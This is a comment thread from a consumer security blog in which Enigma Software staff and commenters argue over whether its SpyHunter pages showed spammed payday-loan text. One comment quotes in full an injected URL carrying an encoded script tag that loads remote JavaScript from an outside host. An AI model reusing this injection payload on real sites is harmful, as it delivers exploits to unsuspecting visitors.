I have no doubt there will be more to follow… Stay tuned.
Enigma software, have they been spoofed
Previous post: Enigma of enigma software
Next post: KvmSecure Rogue Security Program
Consumer Security on the web, information to assist you in practicing safe computing
-
-
Recent Posts
- FDA to review femur fractures connection
- Microsoft Security Advisory (981374)
- Energizer Bunny’s battery charger software contained backdoor Trojan
- Osteoporosis drugs: possible effects of long term use
- Mariposa Botnet infection cleanup
- Opera Vulnerability Identified
- Microsoft Security Bulletin Advance Notification for March 2010
- Convicted Spammer starts sentence
- Security Seal provider to settle FTC charges
- MS10-015 security update re-released
-
Recent Comments
- Micheal on orbasoft.com spammer
- James miller on Microsoft anti-piracy Consumer Action
- Kjetil Pettersson on Installing Windows 7
- certifiedbug on Brian Krebs bids farewell to The Washington Post
- Cd-MaN on Brian Krebs bids farewell to The Washington Post
- certifiedbug on AVG update removed critical Windows file
- carol ogle on AVG update removed critical Windows file
- Frank Miller on orbasoft.com spammer
- certifiedbug on Installing Windows 7
- Tony on Installing Windows 7
-
Member
-
This work by http://certifiedbug.com/blog/ is licensed under Creative CommonsQuoted material is © of original author
-
Certifiedbug.com ©2005-present
-
Tags
FBI Forums Innovative Marketing Edelman Russinovich Spyware Windows 7 Windows-Home-Server XPAntivirus2008 Internet McAfee Software AOL Comodo MSN Spam Adobe Reviews DreamSpark Music Rootkit Vendors Ecatel Dell Internet Security Windows Server Spybot Search & Destroy P2P Messenger Plus! Piracy pharmaceuticals FDA Phish Hack WGA Search Technology FCC Program EstDomains Animal cruelty email Browser Thunderbird FeedDemon McColo Autorun Windows-Update Trojan Update Drivers Plish Scam ID Theft DRM 180Solutions Wallpaper Cloud Safari Enterprise Rogue Site Advisor DirectRevenue Gator Advisory Malware Firefox RFID Social-Engineering Atrivo-Intercage BBC Stopbadware Social-Networking Ddos trustmarks XP Spoof Apple Microsoft Conficker Plugin Directi Advertisers IRC MSN Featured Offers Scam Worm RightMedia RSS Symantec Live Botnet IE8 Busted Attacks Summit Vulnerability ISP Zlob Platrium This and ThatArchives
Categories
Fellow Bloggers
Bookmarks
Security Forums
Microsoft Windows
Get smart with the Thesis WordPress Theme from DIYthemes.
{ 1 trackback }
{ 22 comments }
You are spreading false rumors on your site
This image is a fake that was made with the sole intent to damage our reputation.
http://certifiedbug.com/blog/wp-content/enigmasoftware4.png
Enigma is not in the credit business and Enigma has not been spoofed, and there are false statements and images on this webpage http://certifiedbug.com/blog/2008/05/21/enigmasoftware-payday-loan/. There are images suggesting to readers of your site that our web site and servers have been compromised. And that our software is scanning for bad credit and offering pay day loans. The image suggesting that SpyHunter will scan the Entire computer to detect negative credit is a fake image. It was never on our servers.
Fake Image URL: http://certifiedbug.com/blog/wp-content/enigmasoftware4.png
As far as the URL and title referenced in the article. Our pages are dynamically generated, where you can pass parameters and the page will have the title and other keywords based on the querystring keyword or phrase passthrought it. For example, in the page you are describing http://www.enigmasoftware.com/spyhunter_more_info.php?n=?n=xxxx will change the content inside the title tags xxxx. This is a common practice in most dynmaically generated content on most content management systems.
Someone created an account on a china expatriate forum that made only one post with a link on this page http://www.alloexpat.com/china_expat_forum/member56188.html to a non-existent page on our server which was then dynamically generated. The page, which subsequently showed up in Google. Has text relating to Payday Loans.
This whole situation then became blown out of proportion with someone under the alias of JeanInMontana making accusations that we are using data that we collect for phishing and Spam. These accusations are false and entirely basesless.
Enigma Software Group USA, LLC is not in the loan business.
On the contrary, this site was spammed with links to the site from which I took the screenshots yesterday.
Which is why I wondered if the site had been spoofed.
I see the exact same links now redirect to a legitimate page.
Google is your friend
hxxp://www.google.com/search?hl=enamp q=%22
Scan+your+entire+computer+to+detect+negative+credit+
-+Payday+loan&btnG=Search
Sorry, Enigma Software Group USA, LLC; but the fact is your page did say that until recently.
Trust me, you don’t need us to damage your reputation – ESG do that all by themselves ……..
And nope, the image is NOT a fake …… many of us witnessed the same thing. All you have done, to prevent this being seen, is fix the bug in your site, that allowed script injection.
Previously, someone had attempted to redirect victims to an exploit, via your website. Since your site was not correctly filtering HTML codes, the following with Javascript disabled, displayed what is shown in the screenshot shown by CB, and with JS enabled, took the victim to the exploit;
hxxx://www.enigmasoftware.com/spyhunter_more_info.php?n=negative%20credit%20-%20Payday%20loan
%20-%20Up%20to%202500$%20Next%20day%20in%20your%20Bank
%20account%20payday%20loan%3Cscript
%20src=http://cmiia.com/o9.js%3E%3C/script%3E
Since you’ve fixed this, it now correctly leads to;
spyhunter_more_info.php
We’re not stupid Alvin ;o)
“Trust me, you don’t need us to damage your reputation – ESG do that all by themselves”
Steven, I remember you from other conversations, that is your opinion and irrelevant to what we are discussing. We are aware of your opinions on us. Our loyal customers do that share your opinion. I think your issue with us is almost like a personal obsession. I would advise to please let’s stick to the issues. For example, the issue of the page with the exploited querystring (n=…..) Let’s address that.
You are correct the page was there. It was simply what we had previously stated
Enigma landing pages are dynamically generated, where you can pass parameters and the page will have the title and other keywords based on the querystring keyword or phrase passed through to it. For example, in the page you are describing http://www.enigmasoftware.com/spyhunter_more_info.php?n=xxxx will change the content inside the title tags xxxx. This is a common practice in most dynmaically generated content on most content management systems.
Someone started spamming links on sites such as china expatriate forum (http://www.alloexpat.com/china_expat_forum/member56188.html ) to an invalid URL on our server which was then dynamically generated. The page, which subsequently showed up in Google had text relating to Payday Loans. This is not our business and never was nor are we interested in it.
The site I was at when I took the screenshots had a problem, (for whatever reason), it obviously appears to be corrected now.
The same spammer who posted the link originally did it again today.
ShadowPuterDude,
“Sorry, Enigma Software Group USA, LLC; but the fact is your page did say that until recently.”
The bottom-line:
As I stated before, that page had a parameter that was exploited by that forum poster who linked to the page knowing that the page will display on the title and the body whatever he or she wanted to display.
By no means that was a server level spoof. That was simply exploiting the known (n=…) querystring to manipulate the page.
We have no interest in the credit or loan business….
Anybody could have exploited that link into anything they wanted to exploited for…. We have corrected the problem as soon as my technical team became aware that they were doing it.
Certifiedbug , we will investigate who is this forum spammer who has it in for us.. He or she will not be able to exploit that querystring anymore. We are exploring our options with our legal counsel.
Do you want the spammer’s IP Alvin Estevez.
Alvin, I have updated my blog post to say that despite the statement in the article I linked to which claims Enigma has changed its name, you have posted to confirm otherwise.
As for the above issue of the spammer and potential exploit redirection, would it not be beneficial in this case to work with Tashi with regards tracking down and shutting down the spammers if at all possible? It seems to me bringing this issue to light has actually been beneficial to yourselves in terms of both making you aware of it, and also giving you the chance to take action to shut this person down completely. Just a thought
PaperGhost,
I wanted to speak to you on the Anti-Spyware Coalition consortium meeting last January of this year.
I was sitting in the audience and enjoyed some of the work you do with the young hackers.
I am willing to work with Tashi to find those spammers.
My only issue is, the IP can be bogus, what if they are using proxies or compromised computers? But at least is a starting point….
Alvin
Paperghost,
Is there a way for us to speak to you in private?
Alvin
Email me at Paperghost@vitalsecurity.org is the quickest way. Its late here, but I will wait up for your message
Alvin,
I am quite familiar with Content Management Systems and dynamically generated web pages.
Some person or persons have taken advantage of a vulnerability in your software and exploited it. You have since corrected the vulnerability to prevent code injection.
That doesn’t change the fact that some one from your company falsely accused certifiedbug of posting fake images and spreading false rumors. Those pages did exist, with the content displayed; as posted in the article. I’ve seen them, 4 pages, including spyhunter_more_info.php.
Be thankful that the malicious redirect,was ineffective. I’ve been to the redirect, to investigate. I won’t discuss the particulars of the attempted exploit in an open discussion that anyone, including the perpetrators, can view.
ShadowPuterDude,
Do not post it here.. But what 4 other pages are exposed? and How can we communicate privately to discuss the particulars?
Thanks,
Alvin
ShadowPuterDude,
“Some person or persons have taken advantage of a vulnerability in your software and exploited it.”
It was not my “Software” that was exploited, it was simply the page or pages to be exact.
Alvin
Alvin,
You can contact me at spd@malwareks.com, and I’ll give you the information I have.
If you use the vulnerable code on other pages, you’ll will want to review your code, and notify the author of the CMS, you use, of the code injection vulnerability.
Correcting my miss-typed email addy: spd@malwareteks.com
While looking for a cure for XP Antivirus 2008 I found www.wiki-security.com. Except for no search function, it’s a pretty legitimate looking AV site. The weird thing is that every page has a download link for SpyHunter. It’s like some sort of covert ad for SpyHunter. The weirder thing is that when I clicked on a link to download the “free” software it’s blocked by our AV firewall tagging it as W32.JAKUZ, a known keylogger (Kaspersky).
Hello bonzo,
I tested the download with two different AV’s, niether alerted.
What do you mean by “our AV firewall” ?
Search on W32.JAKUZ at Kaspersky.
Comments on this entry are closed.